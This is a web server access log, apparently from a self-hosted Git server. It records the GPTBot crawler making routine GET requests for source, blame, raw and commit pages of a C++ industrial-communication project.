"https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/metadata.json" -[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/metadata.json" -[17/Feb/2026:15:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10315] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project" -[17/Feb/2026:15:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10328] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project" -[17/Feb/2026:15:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23927] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" -[17/Feb/2026:15:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176801] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176800] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176798] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" [Client 74.7.227.38] [Length 10133] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10720] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" -[17/Feb/2026:15:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10721] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" -[17/Feb/2026:15:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71401] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659893] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71399] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659893] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71402] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10200] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp2.md" -[17/Feb/2026:15:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10527] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" -[17/Feb/2026:15:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10512] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" -[17/Feb/2026:15:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode" -[17/Feb/2026:15:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" -[17/Feb/2026:15:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" -[17/Feb/2026:15:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-cpp.md" -[17/Feb/2026:15:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10486] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10483] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode" [Client 74.7.227.38] [Length 10146] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode" [Client 74.7.227.38] [Length 10144] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" -[17/Feb/2026:15:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10502] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 